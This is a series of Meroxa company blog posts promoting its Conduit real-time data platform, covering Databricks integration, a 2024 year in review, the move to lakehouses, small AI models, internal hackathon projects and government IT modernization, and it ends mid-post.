- Its developer-friendly platform allows engineering teams to build pipelines in hours rather than days.
- Key Benefit: Reduce data latency from 24 hours to under 30 seconds, ensuring immediate availability for ML models.
Unified Data Processing in Databricks
- Data from multiple sources is consolidated into Delta Lake, ensuring consistency and enabling low-latency querying.
- Databricks’ scalable environment processes billions of daily events efficiently, even during peak loads.
- Feature engineering is streamlined, supporting the creation of 50+ model features without manual intervention.
End-to-End Pipeline Automation
- Integration between Meroxa and Databricks automates the entire data pipeline, eliminating manual ETL processes.
- Real-time monitoring and observability tools help reduce troubleshooting time by 40%, ensuring data reliability.

The Results: Faster Insights and Enhanced Predictions

Organizations implementing the Meroxa-Databricks solution realize measurable outcomes, including:

Accelerated Model Training
- ML training cycles shrink from 48 hours to 6 hours, enabling faster deployment and iteration of AI models.
- Teams can deploy 10% more models per quarter, enhancing agility and innovation.
Improved Prediction Accuracy
- Access to real-time, high-quality data improves model accuracy by 23%, boosting customer engagement.
- Applications like product recommendations experience a 35% increase in click-through rates (CTR).
Operational Efficiency Gains
- Automated workflows save 30+ hours per week for engineering teams, allowing them to focus on strategic initiatives.
- Integration costs decrease by 25% compared to batch-based ETL processes.
Scalability for Growth
- The system seamlessly scales to handle 2x data volume growth without additional infrastructure investment.
- Adding new data sources is streamlined, requiring less than a week for integration.
Business Impact
- Conversion rates increase by 15%, and abandoned cart rates drop by 12%, driving immediate ROI.
- Revenue from personalized insights grows by millions annually due to enhanced prediction accuracy and real-time availability.

Key Benefits

Meroxa: Provides real-time, reliable data ingestion with developer-focused tools, reducing latency and manual intervention.
Databricks: Delivers scalable, unified data processing and analytics, enabling organizations to build and deploy AI models efficiently.
Synergy: Together, they create a powerful, automated pipeline solution that supports rapid AI/ML workflows, real-time insights, and business scalability.

Conclusion

The Meroxa and Databricks integration transforms how organizations approach AI/ML workflows. By eliminating data silos, reducing latency, and automating pipelines, this solution delivers faster, more accurate insights that drive tangible business outcomes.

Ready to unlock your data’s full potential? Get started with Meroxa today!

Meroxa’s 2024 Year in Review: Big Wins and a Bright Future in AI

Dion Keeton — Tue, 31 Dec 2024 09:25:00 GMT

As 2024 draws to a close, we’re taking a moment to reflect on an incredible year at Meroxa. From groundbreaking advancements in our Conduit Platform to new AI-powered innovations, this year has been nothing short of transformative. Here’s a look back at our key wins and a glimpse into what 2025 has in store as we continue to lead the charge in the data movement and AI landscape.

2024 Highlights

1. Expanding the Boundaries of Real-Time Data Movement

In 2024, we empowered organizations to move data faster and more efficiently than ever before. Leveraging the power of our Conduit Platform, businesses built real-time pipelines that drive instant decision-making, fueling everything from fintech applications to personalized customer experiences. Notably, we enhanced Conduit with key features like:

Conduit Platform Enhancements

Conduit v0.10 – Multiple Collections Support (April 29, 2024): This release introduced multiple collections support, enhancing the platform’s ability to handle diverse data integration scenarios. The update aimed to improve efficiency, security, and performance for data operations.

Conduit Platform by Meroxa (June 18, 2024): Meroxa launched the Conduit Platform, bringing a host of new features and improvements designed to enhance real-time data streaming experiences. Powered by the robust Conduit open-source core, this transformation offers enhanced performance, scalability, and usability, along with access to over 100 connectors maintained by the open-source community.

Conduit v0.11 – Schema Support (August 19, 2024): This version focused on adding schema support, enabling users to detect schema changes and retain type information end-to-end. This enhancement streamlines data integration processes, improving efficiency and performance.

Conduit v0.12.0 – Pipeline Recovery (October 11, 2024): This release introduced pipeline recovery features designed to automatically restart pipelines experiencing temporary errors, such as network interruptions or service downtime. With configurable backoff settings, Conduit efficiently handles retries, reducing the impact of transient issues and ensuring continuous data flow.

Conduit Operator v0.02 – Schema Registry Support (October 24, 2024): The updated Conduit Operator now includes built-in schema registry support, allowing seamless data encoding and decoding. This enhancement improves data compatibility across pipelines, ensuring smoother and more reliable handling of complex data flows.

These product releases reflect Meroxa’s commitment to providing cutting-edge tools for real-time data integration and processing, empowering organizations to build efficient and scalable data pipelines.

For more detailed information on these releases, visit Meroxa’s blog.

New Connectors and Integration Tools

Conduit Connector for Apache Flink (June 17, 2024): Meroxa introduced a Conduit connector for Apache Flink, combining Flink’s robust stream processing capabilities with Conduit’s lightweight and fast data streaming solution. This integration simplifies the creation of connectors, expanding Flink’s capabilities.

HTTP Connector for Conduit (April 12, 2024): The new HTTP Connector enhances data integration by facilitating seamless communication with any API endpoint. This tool is designed for developers and enterprises looking to streamline data workflows and maximize connectivity.

Amazon DynamoDB (Beta): Enabled real-time data streaming from Amazon DynamoDB, allowing users to integrate NoSQL data into their pipelines.

Amazon Redshift (Developer Preview): Introduced support for Amazon Redshift, facilitating data movement to and from this popular data warehousing service.

Apache Kafka (Developer Preview): Provided integration with Apache Kafka, enabling high-throughput, low-latency data streaming capabilities.

Microsoft SQL Server (Developer Preview): Added support for Microsoft SQL Server, allowing seamless data integration with this widely used relational database.

MongoDB (Developer Preview): Enabled real-time data streaming to and from MongoDB, supporting flexible, document-oriented data structures.

MySQL (Developer Preview): Introduced integration with MySQL, facilitating real-time data movement for this popular open-source relational database.

PostgreSQL (Developer Preview): Provided support for PostgreSQL, enabling efficient data streaming with this advanced open-source relational database.

Snowflake (Developer Preview): Enabled integration with Snowflake, allowing users to stream data into this cloud-based data warehousing platform.

These connector releases have been instrumental in broadening the Conduit Platform’s integration capabilities, allowing users to connect a diverse range of data sources and destinations seamlessly. For a comprehensive list of available connectors and their current statuses, please visit Meroxa’s Connectors Page.

For the most up-to-date information on connector availability and platform features, please refer to Meroxa’s official Changelog.

2. Accelerating AI Innovation

2024 was the year of AI, and Meroxa took the lead by integrating AI functionalities into the Conduit Platform. Highlights include:

Real-Time AI Inference Pipelines: Enabling businesses to operationalize AI insights faster than ever.
Fintech-Specific AI Solutions: Supporting fintech companies in fraud detection, credit scoring, and personalized finance tools, making AI both accessible and impactful in highly regulated industries.

These advancements positioned Meroxa as a trusted partner for organizations looking to operationalize AI at scale.

3. Transforming the Hospitality Industry: A Customer Success Story

One of our most exciting achievements in 2024 was helping The Hotels Network (THN) revolutionize their data integration processes. Facing challenges with siloed data between their sales and support teams, THN partnered with Meroxa to streamline their data flow using our Conduit Platform. By creating a unified, real-time pipeline from Salesforce to Redpanda, THN achieved significant improvements in operational efficiency and customer support capabilities.

"The Meroxa team worked with us to design, build & deploy an efficient low-code solution to connect our Salesforce org with our internal backend system via the Redpanda streaming platform."

– David Sanchez Carmona, Senior GTM Systems Manager, The Hotels Network

This collaboration exemplifies the transformative impact of Meroxa’s platform in addressing complex data challenges across industries.

4. Supporting the Defense Sector with Real-Time Data

In 2024, Meroxa’s Conduit Platform played a critical role in supporting defense organizations by enabling real-time data movement and analysis for mission-critical operations. With increasing demands for secure, high-speed data processing, the defense sector turned to Meroxa for solutions that prioritize reliability and compliance.

Key achievements include:

Real-Time Threat Detection: Defense organizations used Conduit to process vast amounts of sensor and satellite data, identifying threats in real time.

Improved Decision-Making: AI-powered insights enabled defense teams to act on critical intelligence faster and with greater accuracy.

Secure and Compliant Pipelines: The Conduit Platform met stringent security requirements, ensuring compliance with defense industry regulations.

“Meroxa’s technology has become indispensable to our operations. The speed and reliability of their platform allow us to process data in real time, which is essential for maintaining situational awareness and ensuring mission success.”

– Director of Data Operations, Leading Defense Agency

4. SOC 2 Certification: A Commitment to Security

Security is non-negotiable in today’s data-driven world, and we’re proud to have achieved SOC 2 certification this year. This milestone underscores our commitment to delivering a platform that meets the highest standards of security and trust.

5. Community and Ecosystem Growth

Meroxa’s community grew exponentially in 2024, with thousands of developers and data professionals leveraging our platform. Events like #AstroWeek and our hands-on workshops around building real-time analytics dashboards using Postgres, ClickHouse, and Grafana were met with overwhelming participation.

Our partnerships also expanded to include leading data and AI ecosystems, making Meroxa a critical piece of the modern data stack for organizations around the globe.

Looking Ahead to 2025

As we enter 2025, we’re doubling down on AI and data movement innovation. Here’s what’s on the horizon:

1. AI-Powered Platform Enhancements

Next year, we’re launching a suite of AI-driven tools designed to further simplify and enhance data engineering workflows. Expect features like:

Intelligent Pipeline Recommendations: AI-powered insights to optimize pipeline performance and reduce costs.
Proactive Anomaly Detection: Real-time identification of data issues to ensure reliability.
Expanded AI Integrations: Seamless connectivity with cutting-edge AI platforms to supercharge your workflows.

2. Democratizing Real-Time AI for All

We believe the future of AI should be accessible to every organization, regardless of size. In 2025, Meroxa will unveil entry-level pricing models and self-serve options to help small businesses harness the power of real-time AI insights.

3. Deeper Vertical Specialization

Building on our success in fintech, we’ll expand AI-driven solutions for other key industries, including healthcare, e-commerce, and logistics. This will include tailored use cases like real-time supply chain optimization and personalized healthcare insights.

4. Continued Commitment to Sustainability

As part of our sustainability initiative, we’re working to reduce the environmental impact of data movement. Look for updates in 2025 as we optimize our platform for energy-efficient operations, ensuring real-time data movement is not just fast but also green.

Thank You for an Amazing 2024

To our customers, partners, and the broader data community—thank you for making 2024 a year to remember. Your trust and innovation drive everything we do. As we look toward 2025, we’re excited to continue building a future where real-time data movement and AI empower every organization to achieve their boldest goals.

Stay tuned for more updates, and here’s to a groundbreaking year ahead! If you are looking to learn more now…..Sign up!

The Meroxa Team

Why the Lakehouse Is Replacing the Outdated Data Warehouse for Real-Time Streaming

DeVaris Brown — Fri, 20 Dec 2024 07:28:00 GMT

Data warehouses have been at the heart of analytics for decades, helping organizations make sense of their data. While these systems excel at handling static, structured datasets, they struggle to meet the dynamic needs of today's data-driven teams—especially when it comes to real-time streaming data.

That's where the Lakehouse comes in. Think of it as the best of both worlds: it combines data lakes' flexibility with traditional warehouses' powerful querying capabilities. This innovative architecture easily handles dynamic, unstructured, and semi-structured data, making real-time analytics a breeze.

At Meroxa, we're here to be your trusted partner in this journey. We know that embracing new technology can feel like a big step, so we've created friendly tools and services to make your transition to the Lakehouse smooth and worry-free. Let's explore together why Lakehouses are the future and how Meroxa can help you get there.

Let's Talk About Why Data Warehouses Are Holding You Back

1. Stuck in the Batch Processing Stone Age

Look, I hate to break it to you, but data warehouses are living in the past. They were brilliant for their time, but trying to handle today's lightning-fast data streams with batch processing? That's like trying to drink from a fire hose with a coffee cup. Are those ETL pipelines you're using? They're turning your real-time data into yesterday's news.

2. The Money Pit of Scaling

Here's an uncomfortable truth: scaling your data warehouse for streaming is probably costing you a small fortune. Those proprietary solutions aren't just expensive—they're highway robbery. And let's be honest about resource provisioning: you're either wasting money on unused capacity or crossing your fingers hoping your system doesn't crash during peak times. Neither is a great look, right?

3. Square Peg, Round Hole: The Structured Data Dilemma

Let's get real—your data doesn't arrive in perfect little packages anymore. It's messy, it's diverse, and it's constantly evolving. Yet here we are, forcing JSON, logs, and IoT data through the equivalent of a data strainer just to make it warehouse-friendly. Spoiler alert: there's a better way, and it's called a Lakehouse.

The Lakehouse Revolution

Let me share something exciting: Lakehouses are transforming how we handle data, especially when it comes to real-time streaming. Here's why this matters for your business.

1. Unified Architecture

Imagine having all your data—structured and unstructured—working together seamlessly in one place. That's what Lakehouses deliver. They process your data in real-time, without the delays of traditional ETL processes that can slow you down.

2. Real-Time Analytics at Scale

Thanks to innovative table formats like Apache Iceberg, Delta Lake, and Apache Hudi, you'll get lightning-fast insights from your streaming data. Here's what makes this technology special:

Concurrency: Your entire team can work with the data simultaneously—no more waiting your turn.
Time Travel: Need to look back at yesterday's data? No problem. Track changes and audit with ease.
Schema Evolution: As your data needs change, your system adapts smoothly, keeping your operations running without interruption.

3. Open Standards, Cloud-Native Flexibility

Here's the best part: Lakehouses are built on open standards and cloud-native technology. This means you're not locked into any single vendor's ecosystem. You're free to choose the tools that work best for your team and adapt as your needs evolve.

How Meroxa Makes Your Lakehouse Journey Simple

Ready to modernize your data architecture but feeling a bit overwhelmed? We get it. Moving to a Lakehouse involves several moving parts—but that's exactly why we're here to help you succeed.

1. Your Real-Time Data Partner

Think of Meroxa as your trusted guide in building real-time data pipelines. We've done the heavy lifting, creating a platform that turns complex data integration into a smooth, automated process. Your team can focus on what really matters: creating value from your data.

2. Seamless Pipeline Management

Our stream processing platform takes care of everything—from data ingestion to transformation and delivery. Whether you choose Apache Iceberg, Delta Lake, or Apache Hudi, our pre-built connectors and intuitive interface make setup a breeze.

3. Growth-Ready Architecture

As your data needs grow, we grow with you. Our cloud-native platform automatically scales to match your demands while keeping costs in check. No more worrying about infrastructure—we've got you covered.

4. Expert Migration Support

Change can be challenging, but you're not alone. Our team of experts provides hands-on guidance throughout your journey, from initial architecture design to final implementation. We're committed to your success every step of the way.

5. Complete Visibility

Stay in control with our comprehensive monitoring tools. Track performance, spot potential issues early, and keep your data flowing smoothly. It's like having a mission control center for your data operations.

Take the Next Step

The era of traditional data warehouses is coming to an end. Today's real-time data demands require a more agile, efficient approach—and that's exactly what the Lakehouse delivers.

By combining the best of data lakes and warehouses with cutting-edge technology like Iceberg, Delta, and Hudi, the Lakehouse architecture opens up new possibilities for faster, more flexible data insights.

Let Meroxa be your partner in this transformation. Whether you're starting fresh or upgrading from a legacy system, we have the expertise, tools, and support to make your transition successful. Don't let outdated technology hold you back—embrace the future of data architecture with Meroxa.

Ready to transform your data architecture? Schedule a demo today and see how Meroxa can accelerate your success.

Real-Time Analytics with Databricks and Meroxa's Conduit Platform AI

Dion Keeton — Thu, 19 Dec 2024 22:14:00 GMT

With the current state of data, businesses need real-time analytics to make faster, smarter decisions. While Databricks excels in processing large datasets and enabling advanced analytics, the challenge lies in ensuring real-time, accurate, and reliable data integration. Enter Meroxa's Conduit Platform AI, designed to simplify and optimize the flow of real-time data into Databricks with measurable advantages.

The Challenge of Real-Time Analytics with Databricks

Databricks offers unparalleled analytics capabilities, but businesses face common hurdles when integrating real-time data:

Complexity of Integration: Building pipelines for real-time data from diverse sources requires significant engineering effort.
High Latency: Slow data delivery can make real-time analytics impossible.
Scalability Issues: Surging data volumes demand pipelines that can grow effortlessly.
Pipeline Maintenance: Monitoring and troubleshooting pipelines take time and resources.

How Meroxa's Conduit Platform AI Overcomes These Challenges

Meroxa's Conduit Platform AI provides a streamlined, scalable, and intelligent solution for real-time data integration with Databricks. Here’s how it delivers unique value:

1. Faster Time to Insights (Up to 40% Improvement)

Conduit accelerates real-time data ingestion and processing, reducing pipeline setup and data delivery time by 40%, allowing Databricks users to act on insights faster than ever.

Automated Pipeline Creation: Build pipelines in minutes, not days.
AI-Driven Schema Adaptation: Handles changes in data structure automatically, minimizing downtime.

2. Reduced Engineering Effort (60% Cost Savings)

Manual pipeline management consumes time and resources. Conduit eliminates 60% of the engineering effort needed for real-time data integration through AI automation.

Self-Healing Pipelines: Detects and resolves issues without manual intervention.
Low-Code Interface: Create and manage pipelines without deep coding expertise.

3. Near-Zero Latency (Up to 30% Faster Delivery)

Meroxa’s platform ensures data streams with near-zero latency, improving delivery speed by up to 30% for real-time analytics in Databricks.

Optimized Connectors: Pre-built, high-performance connectors for common data sources like Kafka, Postgres, and more.
Dynamic Data Routing: Ensures low-latency streaming, even during peak data loads.

4. Scalability and Resilience (99.9% Uptime)

Conduit is designed to scale seamlessly as your data grows while maintaining 99.9% uptime, ensuring uninterrupted analytics in Databricks.

Horizontal Scaling: Automatically adjusts to increased data volumes.
Load Balancing: Distributes workloads efficiently to prevent bottlenecks.

5. Proactive Monitoring and Visibility (50% Reduction in Downtime)

Conduit’s real-time monitoring tools reduce pipeline downtime by 50%, giving you confidence in your data streams.

Live Dashboards: Monitor pipeline performance at a glance.
Proactive Alerts: Receive notifications before issues impact your analytics.

Use Case: Streaming Financial Transactions into Databricks

A fintech company processes millions of financial transactions daily and uses Databricks for fraud detection and customer insights.

Challenges:

Integrating real-time transaction data from multiple sources.
Maintaining low latency to detect fraud as it happens.
Ensuring scalability during peak transaction periods.

Solution with Meroxa Conduit Platform AI:

40% Faster Time to Insights: Real-time data from transactions is streamed into Databricks instantly, enabling near-instant fraud detection.
60% Less Engineering Effort: Automated pipelines save engineering resources, allowing teams to focus on fraud analytics.
99.9% Uptime: Ensures uninterrupted data flow, even during high transaction periods.

Unlock the Power of Real-Time Analytics

By combining Databricks’ analytics capabilities with the automation and intelligence of Meroxa’s Conduit Platform AI, businesses can achieve faster, smarter, and more reliable real-time insights. Whether you're processing financial transactions, IoT data, or user behavior, our platform ensures that your analytics pipelines are optimized for success.

Start your real-time analytics journey today with Meroxa. Sign up to see how we can transform your data strategy.

Why Bigger Isn’t Always Better: The Case for Ditching LLMs in Favor of Tiny Models Powered by Real-Time Data

DeVaris Brown — Wed, 18 Dec 2024 23:17:00 GMT

As the CEO of Meroxa, I've had a front-row seat to the AI revolution sweeping through the enterprise technology. Companies that just came to grips with having to become a data company are now scrambling to leverage AI to optimize huge parts of their business. While large language models (LLMs) like GPT-4, Claude, Llama, and Gemini have captured the public imagination, I'm increasingly convinced that the future of practical AI applications lies in a different direction: tiny, specialized language models powered by real-time data streams.

The Hidden Costs of Large Language Models

Let's be frank: LLMs are impressive, but they come with significant drawbacks. Training these models requires massive computational resources, with costs running into millions of dollars. They consume enormous amounts of energy, making them environmentally questionable. And despite their size, they still struggle with hallucinations – those confident but incorrect responses that can wreak havoc in business applications.

But perhaps most importantly, LLMs are fundamentally disconnected from your business's current reality. They're trained on historical internet data, not your organization's live, operational data. This disconnect creates a critical gap between AI capabilities and business needs.

The Tiny Model Advantage

This is where tiny language models shine. By "tiny," I mean models that are:

Trained on specific domains rather than attempting to know everything
Updated continuously with real-time data streams
Optimized for specific business tasks rather than general-purpose conversation

The advantages are compelling:

1. Reduced Hallucinations Through Real-Time Data

Tiny models trained on current, streaming data are less likely to hallucinate because they're working with fresh, relevant information. When your model is continuously updated with real-time data from your actual business operations, it doesn't need to "fill in the gaps" with potentially incorrect information.

2. Dramatic Cost Reduction

The economics are straightforward. Training a tiny model on a specific domain requires:

Significantly less computational power
Smaller training datasets
Shorter training times
Lower ongoing operational costs

We've seen organizations reduce their AI training costs by 90% or more by switching to domain-specific tiny models.

3. Improved Relevancy and Accuracy

When your model is focused on a specific domain and continuously updated with real-time data, it becomes remarkably accurate within its scope. Instead of being "okay" at everything, it becomes excellent at what matters to your business.

Real-World Applications

Consider a few scenarios where tiny models excel:

Customer Support: Instead of using a general-purpose LLM, deploy a tiny model trained specifically on your product documentation, support tickets, and real-time customer interactions. The model stays current with product updates and emerging issues.

Financial Services: Rather than relying on an LLM's outdated knowledge, use a tiny model that continuously learns from market data, transaction patterns, and regulatory updates.

Supply Chain Operations: Deploy models that understand your specific inventory, logistics, and supplier relationships, updated in real-time as conditions change.

The Hybrid Approach

This isn't to say that LLMs don't have their place. A hybrid approach often works best:

Use LLMs for broad, creative tasks where general knowledge is valuable
Deploy tiny models for specific, business-critical operations where accuracy and currentness are paramount
Leverage both in combination where appropriate

The Critical Role of Data Streams

Here's where the rubber meets the road: tiny models are only as good as the data they're trained on. The key to success is having robust, reliable data streams that can:

Capture real-time business events
Clean and prepare data automatically
Feed models continuously for training and updates

This is why at Meroxa, we've focused on building the infrastructure that makes this possible. Our platform enables organizations to create and manage the real-time data streams that power these next-generation AI systems.

Reference Architecture

To make this concrete, let's look at a reference architecture for implementing tiny language models with real-time data streams:

This architecture shows how Meroxa serves as the foundation for real-time data processing that powers tiny language models. Let's break down the key components:

Data Ingestion: Meroxa handles real-time data capture from various sources, ensuring no valuable information is lost.
Stream Processing: Our Turbine engine processes and transforms data in real-time, preparing it for model consumption.
Data Storage: A multi-tiered approach combines historical data for training with hot data for real-time inference.
ML Pipeline: Continuous training and evaluation ensure models stay current and accurate.
Monitoring: Comprehensive monitoring helps detect data drift and trigger model updates when needed.

The beauty of this architecture is its ability to maintain model freshness while managing computational resources efficiently.

Getting Started

The path to implementing tiny models in your organization starts with your data infrastructure. Here's what you need:

Identify the specific domains where AI could add value
Map out your data sources and streams
Set up real-time data pipelines (this is where Meroxa comes in)
Start small with a focused model in one domain
Measure results and iterate

The Path Forward

As AI continues to evolve, the winners won't be those with the biggest models, but those with the most relevant ones. The combination of tiny models and real-time data streams represents a more sustainable, efficient, and effective approach to enterprise AI.

Ready to explore how tiny models could transform your organization? Let's talk about how Meroxa can help you build the real-time data infrastructure that makes it possible. Sign up

Champagne Week: Driving Innovation and Collaboration at Meroxa

Dion Keeton — Mon, 16 Dec 2024 16:04:00 GMT

At Meroxa, we celebrate innovation and teamwork during Champagne Week—a time when our team comes together to deliver impactful updates and enhancements. This year was no exception, featuring exciting projects that advance the Conduit platform and its ecosystem. Here’s a detailed look at the highlights from this year’s Champagne Week.

1. Automated Connector Status Page

This project introduced a new Doctor Page to streamline how we monitor and maintain our connectors. Previously, the Conduit team manually reviewed connectors to ensure they aligned with the latest versions of libraries and workflows. This project automates that process, offering a clearer and more efficient way to identify where attention is needed.

Key Features:

Automated Checks: The tool uses an existing weekly workflow to update the connector inventory and highlight connectors needing updates.
Focus on Latest Releases: Reduces noise by only fetching relevant versions, avoiding outdated pre-existing requests.
Clear Connector Statuses: Provides an easy-to-read interface showing where action is required.

Future Improvements:

Introduce a "mild" status (orange) for connectors that use the same major and minor versions but not the latest patch.
Enable URL updates based on filters for better shareability.
Add additional fields like the number of open issues or pull requests.

To see the tool in action, visit: Conduit Doctor Page and Watch the demo.

2. Automated Document Summarization with Conduit, OpenAI, and Weaviate

Pull Request #2008 introduced an automated pipeline for ingesting, processing, and summarizing documents. Using Conduit’s documentation as a dataset, this system leverages OpenAI and Weaviate to generate context-rich summaries.

Highlights:

Pipeline Overview:
- Source File: Individual lines of text represent documents, creating a structured input format.
- Processors:
  - Vectorization: Generates embeddings for each document using OpenAI’s API.
  - Context Addition: Retrieves related content from Weaviate to enhance summaries with relevant context.
- Final Output: Summaries are written to a destination file, ready for review or integration into workflows.
Weaviate Integration: The vector database stores both the text and its embeddings, enabling efficient contextual retrieval during processing.
Enhanced Summaries: Initial summaries were generic, but as more documents were processed and embeddings refined, the results became highly accurate and relevant.

This project exemplifies how Conduit can leverage AI and vector databases to handle real-time document summarization effectively. Watch the demo.

3. MQTT Connector: Real-Time IoT Data Processing

A major achievement during Champagne Week was the development of an MQTT connector, highlighted in this demo video.

What is MQTT?

MQTT is a lightweight messaging protocol designed for resource-constrained environments like IoT devices, environmental monitoring systems, and industrial equipment. The MQTT connector allows seamless integration with Conduit pipelines, opening up new use cases in IoT and edge computing.

Key Features:

Flexible Topic Subscriptions: Users can subscribe to or publish data to MQTT topics, including support for wildcards to capture a range of messages.
Pipeline Integration: MQTT messages can be routed to various outputs, such as file storage or Elasticsearch, for analysis and visualization.
Real-World Use Case: The demo showcased how CPU usage data from Raspberry Pi devices was processed through Conduit, stored in Elasticsearch, and visualized in Kibana dashboards. This demonstrated the connector’s capability to enable real-time monitoring of IoT devices.

This connector showcases how Conduit makes it simple to capture, process, and act on IoT data in real time. Watch the demo.

4. AI Showcase: Vectorizing and Summarizing Pipelines

Another exciting project during Champagne Week was an AI showcase demonstrating how Conduit supports popular AI use cases. The showcase featured two distinct pipelines—one for vectorizing data and another for summarizing content—both using test data stored in S3.

Highlights:

Vectorizing Pipeline:
- Converts raw text into embeddings using OpenAI’s API.
- Preserves the original text alongside its embeddings.
- Logs the vectorized output, showcasing how it can be sent to destinations like vector databases.
- Demonstrates simplicity with a concise YAML configuration.
Summarizing Pipeline:
- Processes text using OpenAI to generate concise summaries.
- Example: Summarized test data about experiments with plants and sound waves, showcasing the pipeline’s ability to generate insightful summaries.
- Uses custom processors to shape data for summarization and output structured logs.
Future Enhancements:
- Work is ongoing to support additional file types like PDFs.
- Exploring specialized features to enhance ergonomics for AI use cases.

This project highlights Conduit’s versatility in enabling real-time AI workflows with minimal configuration. Watch the demo.

5. Internal Collaboration and Knowledge Sharing: Champagne Week Demo

Champagne Week isn’t just about shipping features—it’s also about teamwork and sharing successes. During the Champagne Week Demos, team members presented their projects, sharing insights, challenges, and future opportunities.

Key Takeaways:

Cross-Team Insights: Collaboration across teams was critical to addressing challenges and ensuring impactful solutions.
Inspirational Ideas: The demo sparked new directions for future innovations, from platform features to user experience improvements.
Recognition: Acknowledging the creativity and dedication of the team reinforced the value of collaboration and innovation.

What’s Next?

Champagne Week is a springboard for ongoing improvement and growth. Here’s what’s ahead:

Developer Tools: We’ll continue refining tools to enhance the developer experience and reduce friction.
Performance Optimization: Ongoing work to ensure Conduit remains reliable and efficient, even at scale.
Community Engagement: Expanding opportunities to connect with the Conduit community through new features and events.

A Toast to Innovation

Champagne Week embodies the creativity, dedication, and collaboration of the Meroxa team. Thank you to everyone who contributed to making this week a success—and to our users, who inspire us to keep raising the bar.

Stay tuned for more updates and insights as we build the future of real-time data movement. Cheers!

Government IT Modernization with Meroxa: Accelerate Your Digital Transformation

Dion Keeton — Thu, 05 Dec 2024 11:38:00 GMT

Empower Your Government to Work Smarter and Faster

Constituents today expect government services to be as seamless and user-friendly as the digital experiences they enjoy in the private sector. But with legacy systems, siloed data, and increasing demands, many agencies face challenges in meeting those expectations.

At Meroxa, we bridge the gap between traditional government systems and modern digital agility. With our real-time data integration and movement platform, we enable governments to modernize IT infrastructure without sacrificing security, transparency, or cost-efficiency. Whether you’re transforming local services, scaling state-level programs, or overhauling federal systems, Meroxa equips you to work at the speed of innovation.

Our Government IT Solutions

Real-Time Data, Real-Time Results
- Enable real-time insights and decision-making by reducing data latency by up to 60%.
- Deliver on-demand services with seamless data synchronization across departments and platforms.
Modernization Without Overhauls
- Extend the value of legacy systems with modern integrations that don’t require costly replacements.
- Simplify IT transformations with our low-code platform, reducing operational complexity.
Scalability and Efficiency
- Dynamically scale your infrastructure to handle high-volume workloads like benefits processing, public safety initiatives, and more.
- Save up to 30% in operational costs by automating manual workflows and optimizing resource use.
Data Security and Transparency
- Protect sensitive constituent data with end-to-end encryption and robust access controls.
- Maintain compliance with strict audit trails and data lineage features that provide visibility into every transaction.

The Challenges of Government IT Modernization

Transforming government IT isn’t just about technology—it’s about navigating complex challenges:

Legacy Systems: Many agencies still rely on outdated systems that weren’t designed to support modern demands.
Siloed Data: Departments often operate in isolation, leading to inefficiencies and fragmented constituent experiences.
Budget Constraints: Governments need solutions that balance cost, performance, and scalability.

Meroxa helps governments overcome these hurdles by enabling real-time data movement, modern integrations, and flexible infrastructure upgrades—all without the need for costly, full-scale replacements.

How Meroxa Powers Government IT Transformation

1. Real-Time Data Integration

Governments generate and rely on massive amounts of data—but disconnected systems create bottlenecks. Meroxa unifies data flows, enabling real-time communication between legacy systems, new applications, and external platforms.

Key Features:

Seamlessly integrate databases, CRMs, and analytics tools across departments.
Power faster decision-making with real-time insights into mission-critical operations.
Ensure scalability with dynamic pipeline management that adjusts to peak workloads.

Example: A state health department reduced benefits processing times by 50% by unifying data across welfare, healthcare, and child services systems.

2. Cost-Effective Modernization

Replacing aging systems outright isn’t always feasible. With Meroxa, governments can extend the functionality of legacy systems while embracing cutting-edge solutions.

Key Features:

Low-code platform: Simplify complex integrations with intuitive, developer-friendly tools.
Automate data workflows to eliminate manual errors and inefficiencies.
Enable faster rollouts of digital services while staying within budget.

Example: A national child support system managing over $360 million annually saved 20% in operational costs by integrating existing databases with Meroxa’s platform.

3. Better Constituent Services

Modern constituents expect fast, personalized, and secure access to government services. Meroxa helps agencies deliver:

Key Features:

Real-time personalization for services like benefits processing, permit applications, and public inquiries.
Streamlined interagency collaboration to reduce delays and improve outcomes.
AI-powered insights to predict and address constituent needs proactively.

Example: In Israel, welfare application processing times were reduced from months to hours using Meroxa’s real-time data platform.

4. Transparent and Secure Operations

Governments handle sensitive data daily, making security and transparency paramount. Meroxa ensures:

Key Features:

End-to-end encryption: Protect data at every step of the pipeline.
Detailed audit logs and data lineage tracking for compliance and governance.
Secure integration with monitoring tools like Splunk and OpenTelemetry.

Example: A federal agency managing public safety programs maintained 100% compliance with strict data governance regulations by leveraging Meroxa’s security features.

Reimagine Government IT with Meroxa

Modernizing IT infrastructure is no longer optional—it’s essential to meet the needs of today’s constituents. With Meroxa, governments can:

Deliver faster, more efficient services at scale.
Achieve digital transformation without abandoning legacy investments.
Securely manage and share data across systems, agencies, and platforms.

How Can Meroxa Help You?

In the U.S.:

Transform federal, state, and local government services with real-time data integration.

Globally:

From smart cities to social services, Meroxa empowers governments around the world to reimagine how they serve their citizens.

Contact Us:

Ready to modernize your IT infrastructure? Speak to a Meroxa expert today and take the first step toward a more agile, efficient government.

Let’s Connect →

Stale Data is Killing Your AI Models: Why Real Time Data is the Best Path Forward

DeVaris Brown — Mon, 25 Nov 2024 17:42:48 GMT

As we navigate the explosive growth of AI adoption across industries, one challenge remains persistently thorny: ensuring our AI models remain accurate, reliable, and cost-effective to maintain. At Meroxa, we've observed a clear pattern emerge – organizations that leverage real-time data for their AI models consistently outperform those relying on static, historical datasets.

The Hidden Cost of Stale Data

Most organizations today train their AI models on historical data dumps, typically refreshed weekly or monthly. While this approach might have sufficed in the past, it's becoming increasingly inadequate in our fast-paced digital environment. Here's what we're seeing in the field:

Models trained on outdated data are more prone to hallucinations, especially in dynamic domains like finance, e-commerce, and social media
Companies spend millions retraining models that have drifted from reality
Time-to-market for AI features is hampered by lengthy data preparation and training cycles

Real-Time Data: The Antidote to AI Hallucinations

When AI models have access to real-time data streams, they maintain a closer connection to reality. At Meroxa, we've helped numerous organizations implement real-time data pipelines for their AI systems, and the results are compelling:

Our financial services clients report a 40% reduction in model hallucinations after implementing real-time data feeds. The reason is simple – when models can continuously learn from current market conditions, customer behaviors, and emerging patterns, they're less likely to generate responses based on outdated assumptions.

The Economic Argument for Real-Time Data

The financial benefits of real-time data integration extend beyond improved accuracy. We're seeing organizations achieve:

Reduced Training Costs: Instead of massive, periodic retraining sessions, models can be fine-tuned incrementally with fresh data, requiring significantly less computational resources.
Faster Time-to-Market: Real-time data pipelines eliminate the need for time-consuming ETL processes and data preparation, allowing teams to deploy and iterate on models more rapidly.
Lower Infrastructure Costs: By processing data incrementally rather than in large batches, organizations can maintain smaller, more efficient infrastructure footprints.

From Theory to Practice: Implementing Real-Time Data Pipelines

